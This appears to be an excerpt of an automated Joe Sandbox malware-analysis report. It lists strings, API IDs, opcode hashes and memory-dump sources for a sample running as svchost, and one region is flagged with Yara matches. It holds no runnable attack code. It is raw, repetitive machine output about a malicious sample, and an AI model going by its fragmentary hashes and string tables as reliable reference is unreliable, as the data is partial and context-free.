                                                                                                                                                                              • String ID: %$&$@
                                                                                                                                                                              • API String ID: 0-1537733988
                                                                                                                                                                              Strings
                                                                                                                                                                              • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 0310B82A
                                                                                                                                                                              • GlobalizationUserSettings, xrefs: 0310B834
                                                                                                                                                                              • TargetNtPath, xrefs: 0310B82F
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                                                                                                                              • API String ID: 0-505981995
                                                                                                                                                                              Strings
                                                                                                                                                                              • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0308E6C6
                                                                                                                                                                              • HEAP: , xrefs: 0308E6B3
                                                                                                                                                                              • HEAP[%wZ]: , xrefs: 0308E6A6
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                                                                                                              • API String ID: 0-1340214556
                                                                                                                                                                              Strings
                                                                                                                                                                              • Heap block at %p modified at %p past requested size of %Ix, xrefs: 030DDC32
                                                                                                                                                                              • HEAP: , xrefs: 030DDC1F
                                                                                                                                                                              • HEAP[%wZ]: , xrefs: 030DDC12
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                                                                                                                              • API String ID: 0-3815128232
                                                                                                                                                                              Strings
                                                                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 030A82E8
                                                                                                                                                                              • Failed to reallocate the system dirs string !, xrefs: 030A82D7
                                                                                                                                                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 030A82DE
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                                                              • API String ID: 0-1783798831
                                                                                                                                                                              Strings
                                                                                                                                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 030EC1C5
                                                                                                                                                                              • PreferredUILanguages, xrefs: 030EC212
                                                                                                                                                                              • @, xrefs: 030EC1F1
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                                                                              • API String ID: 0-2968386058
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                                                                              • API String ID: 0-1373925480
                                                                                                                                                                              Strings
                                                                                                                                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 030B4888
                                                                                                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 030B4899
                                                                                                                                                                              • LdrpCheckRedirection, xrefs: 030B488F
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                              • API String ID: 0-3154609507
                                                                                                                                                                              Strings
                                                                                                                                                                              • RtlCreateActivationContext, xrefs: 030A29F9
                                                                                                                                                                              • SXS: %s() passed the empty activation context data, xrefs: 030A29FE
                                                                                                                                                                              • Actx , xrefs: 030633AC
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                                                                                                                                              • API String ID: 0-859632880
                                                                                                                                                                              Strings
                                                                                                                                                                              • LdrpInitializeTls, xrefs: 030A1A47
                                                                                                                                                                              • minkernel\ntdll\ldrtls.c, xrefs: 030A1A51
                                                                                                                                                                              • DLL "%wZ" has TLS information at %p, xrefs: 030A1A40
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                                                                                                                              • API String ID: 0-931879808
                                                                                                                                                                              Strings
                                                                                                                                                                              • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0307127B
                                                                                                                                                                              • BuildLabEx, xrefs: 0307130F
                                                                                                                                                                              • @, xrefs: 030712A5
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                                                                              • API String ID: 0-3051831665
                                                                                                                                                                              Strings
                                                                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 030B2104
                                                                                                                                                                              • LdrpInitializationFailure, xrefs: 030B20FA
                                                                                                                                                                              • Process initialization failed with status 0x%08lx, xrefs: 030B20F3
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                                                              • API String ID: 0-2986994758
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ___swprintf_l
                                                                                                                                                                              • String ID: #%u
                                                                                                                                                                              • API String ID: 48624451-232158463
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                                                              • String ID: kLsE
                                                                                                                                                                              • API String ID: 3446177414-3058123920
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: @$@
                                                                                                                                                                              • API String ID: 0-149943524
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: `$`
                                                                                                                                                                              • API String ID: 0-197956300
                                                                                                                                                                              Strings
                                                                                                                                                                              • ResIdCount less than 2., xrefs: 0308EEC9
                                                                                                                                                                              • Failed to retrieve service checksum., xrefs: 0308EE56
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: Failed to retrieve service checksum.$ResIdCount less than 2.
                                                                                                                                                                              • API String ID: 0-863616075
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2272128880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: VUUU$gfff
                                                                                                                                                                              • API String ID: 0-2662692612
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: $$$
                                                                                                                                                                              • API String ID: 0-233714265
                                                                                                                                                                              Strings
                                                                                                                                                                              • RtlpResUltimateFallbackInfo Exit, xrefs: 0303A309
                                                                                                                                                                              • RtlpResUltimateFallbackInfo Enter, xrefs: 0303A2FB
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                                                              • API String ID: 0-2876891731
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: .Local\$@
                                                                                                                                                                              • API String ID: 0-380025441
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: MUI
                                                                                                                                                                              • API String ID: 0-1339004836
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: P`vRbv
                                                                                                                                                                              • API String ID: 0-2392986850
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: 0
                                                                                                                                                                              • API String ID: 0-4108050209
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2272128880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: (
                                                                                                                                                                              • API String ID: 0-3887548279
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: PATH
                                                                                                                                                                              • API String ID: 0-1036084923
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 0-3916222277
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: GlobalTags
                                                                                                                                                                              • API String ID: 0-1106856819
                                                                                                                                                                              • String ID: @
                                                                                                                                                                              • API String ID: 0-2766056989
                                                                                                                                                                              • String ID: @
                                                                                                                                                                              • API String ID: 0-2766056989
                                                                                                                                                                              • String ID: EXT-
                                                                                                                                                                              • API String ID: 0-1948896318
                                                                                                                                                                              • String ID: PreferredUILanguages
                                                                                                                                                                              • API String ID: 0-1884656846
                                                                                                                                                                              • String ID: BinaryHash
                                                                                                                                                                              • API String ID: 0-2202222882
                                                                                                                                                                              • String ID: verifier.dll
                                                                                                                                                                              • API String ID: 0-3265496382
                                                                                                                                                                              • String ID: Actx
                                                                                                                                                                              • API String ID: 0-89312691
                                                                                                                                                                              • String ID: LdrCreateEnclave
                                                                                                                                                                              • API String ID: 0-3262589265
                                                                                                                                                                              • Opcode ID: 8427451ba46bc6ee7483c465b8aae6b8c57a3884628fe0288d197b239215f543
                                                                                                                                                                              • Instruction ID: 851250bcb64cab855bce571b922e8a6e2955c701108b611ba491171fc5b429d1
                                                                                                                                                                              • Opcode Fuzzy Hash: 8427451ba46bc6ee7483c465b8aae6b8c57a3884628fe0288d197b239215f543
                                                                                                                                                                              • Instruction Fuzzy Hash: A42115B1509344AFC324DF1AD844A9BFBF8FBD5B00F104A1EF5A09B250E7B09505CB96
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 0ac7564ea8a35b6c2e7e1a05ee6489b70892fe00347a65bdf56e5cb961a42aba
                                                                                                                                                                              • Instruction ID: 4085d360ace4c7b0517a40027efb799f807afa12d5d64a1cd2efdaed4a611623
                                                                                                                                                                              • Opcode Fuzzy Hash: 0ac7564ea8a35b6c2e7e1a05ee6489b70892fe00347a65bdf56e5cb961a42aba
                                                                                                                                                                              • Instruction Fuzzy Hash: 80824472F102188BCB58CFADDC916DDB7F2EF88314B19812DE416EB349DA34AC568B45
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 075f7a4758ae7b780609c925abc9a58ed24efbc524900986108974868b961305
                                                                                                                                                                              • Instruction ID: 85e923949842ce076e431d66af8af00c764607a86a73b7f4bef0b7b8d846a4bb
                                                                                                                                                                              • Opcode Fuzzy Hash: 075f7a4758ae7b780609c925abc9a58ed24efbc524900986108974868b961305
                                                                                                                                                                              • Instruction Fuzzy Hash: F3628132D0664AAFCF24CF08D8904EEFBA2FE56314B49C59CC89A27604D371B955CBD9
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
Memory Dump Source
• Source File: 00000002.00000002.2272128880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_svchost.jbxd
Yara matches
Memory Dump Source
• Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 56c47e9440d6b66a8fa3b4d4a236796c2a9ac4c6d86ef0717635c330d3d72aea
                                                                                                                                                                              • Instruction ID: 97caea4871719d6c0486b8b9f75f4959ab37374a408ef8994155be2d9e18e4f6
                                                                                                                                                                              • Opcode Fuzzy Hash: 56c47e9440d6b66a8fa3b4d4a236796c2a9ac4c6d86ef0717635c330d3d72aea
                                                                                                                                                                              • Instruction Fuzzy Hash: C291C471E0221DAFDB15CFA8D894BFEBBB5AF48700F144569E951EB340D73AD9008BA4
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 5e72a1704ac629576adbbbce6281459955d142593b4749eaca95b75161fe1327
                                                                                                                                                                              • Instruction ID: 126504e6346bc4e030ddb0b75c410d61560e541abbe6bd23650969702d1e32a2
                                                                                                                                                                              • Opcode Fuzzy Hash: 5e72a1704ac629576adbbbce6281459955d142593b4749eaca95b75161fe1327
                                                                                                                                                                              • Instruction Fuzzy Hash: 6A9124B5A026159FEB24DB68D440BBEB7E5FFC4710F0944BAE8059B680E734DA41C791
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: c9fef6c897d2d17b6968b1edeec42b607ad0362455a3d1f3e1033e33f291d96e
                                                                                                                                                                              • Instruction ID: 8f81a72e5d5eb484922736cf5c7595b9d98c70d1d2051abec1076ad322523334
                                                                                                                                                                              • Opcode Fuzzy Hash: c9fef6c897d2d17b6968b1edeec42b607ad0362455a3d1f3e1033e33f291d96e
                                                                                                                                                                              • Instruction Fuzzy Hash: D7B111B5A0A3418FD354DF28C480A5AFBE5BB89304F18496EF899CB351D371E945CB42
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 9a4050b41c6a135279948fe63c017d1f443f312da45434136b065312031d96b8
                                                                                                                                                                              • Instruction ID: fdfc547320b40497bc1fd9cf6591633653364db20fb8d66396fa73c2c79fdda7
                                                                                                                                                                              • Opcode Fuzzy Hash: 9a4050b41c6a135279948fe63c017d1f443f312da45434136b065312031d96b8
                                                                                                                                                                              • Instruction Fuzzy Hash: 15814B35E06796CFDB21CEEDD8C027EBB95EF52200F2C4ABAD4429B245C364D886C791
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 8549c86322cfe958a29a8ef1ef3c7120cca5d0c53e5cdecc8be8a9795373b755
                                                                                                                                                                              • Instruction ID: 0d0033a06d34d755159429db4ec05bfd9f6290c5cfd4e435e8ce3f4337cf885f
                                                                                                                                                                              • Opcode Fuzzy Hash: 8549c86322cfe958a29a8ef1ef3c7120cca5d0c53e5cdecc8be8a9795373b755
                                                                                                                                                                              • Instruction Fuzzy Hash: 22915172A21A06CFD765CF2DC885766BBE0FF55324B188A18D4E6DB6A0C375E911CB04
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: e62a17b4fa4d11a460a4398f06cd4bb3aeef484526926727dbfdd31f856e6955
                                                                                                                                                                              • Instruction ID: 0dfb45cc1e70212a57f472e779a03d15a3117308225551a5e65964fc6b63e504
                                                                                                                                                                              • Opcode Fuzzy Hash: e62a17b4fa4d11a460a4398f06cd4bb3aeef484526926727dbfdd31f856e6955
                                                                                                                                                                              • Instruction Fuzzy Hash: 66910572E05207AFDB54CF28C8807AAB7E5EF88310F188578EA55DB681D774E952CB90
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 1d6d1201b75a710dee00d70124d55f84bc64ea7d7088b814371f96ae37762702
                                                                                                                                                                              • Instruction ID: 321d9567f28f000dcbfdc0a54f68165fe51829b7185210683a733f5e51f0c902
                                                                                                                                                                              • Opcode Fuzzy Hash: 1d6d1201b75a710dee00d70124d55f84bc64ea7d7088b814371f96ae37762702
                                                                                                                                                                              • Instruction Fuzzy Hash: A591E272A011159FCB18CF69C8906BEBBF1FF88310F1986B9D915DB795DA34E901CB50
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: b977df68cec1e72354baa23e8bf1f5fc25767aa0b2497e1d4d7bf5ec1202c41b
                                                                                                                                                                              • Instruction ID: 5ec3c55d39e780dff86402d0b1daaa5ace230e997447f7c1264fce8a886554da
                                                                                                                                                                              • Opcode Fuzzy Hash: b977df68cec1e72354baa23e8bf1f5fc25767aa0b2497e1d4d7bf5ec1202c41b
                                                                                                                                                                              • Instruction Fuzzy Hash: E481F672E015199FCB54CF69C8805EEB7F5FF88310B18876ADA25E7A80D734E951CB90
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: ebd2ad1866ea02bd204d01ac2354c87b1f2cec99d1b0af6edf7f039379861b9d
                                                                                                                                                                              • Instruction ID: 29685638beb9a134ffa75de87d0b273deea5590f8156aa8b75ed962f91f3b200
                                                                                                                                                                              • Opcode Fuzzy Hash: ebd2ad1866ea02bd204d01ac2354c87b1f2cec99d1b0af6edf7f039379861b9d
                                                                                                                                                                              • Instruction Fuzzy Hash: 1A81A771A01619DFDB54CE5AC8809AEFBF2FFC5210B28C2B5E914AB345D731EA41CB90
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 8da0c2e5b2dffaf9b88047e746dc872c66050d0fe574d3c21fa1a0495867874a
                                                                                                                                                                              • Instruction ID: ecac3523c7088ff893ff6054a2b4cb01304683786b5c192d69deac98243f07e5
                                                                                                                                                                              • Opcode Fuzzy Hash: 8da0c2e5b2dffaf9b88047e746dc872c66050d0fe574d3c21fa1a0495867874a
                                                                                                                                                                              • Instruction Fuzzy Hash: 38816E76E012199FCB28CF99C5906ADFBF1EF89310F1981AAD816EF385D7349941CB90
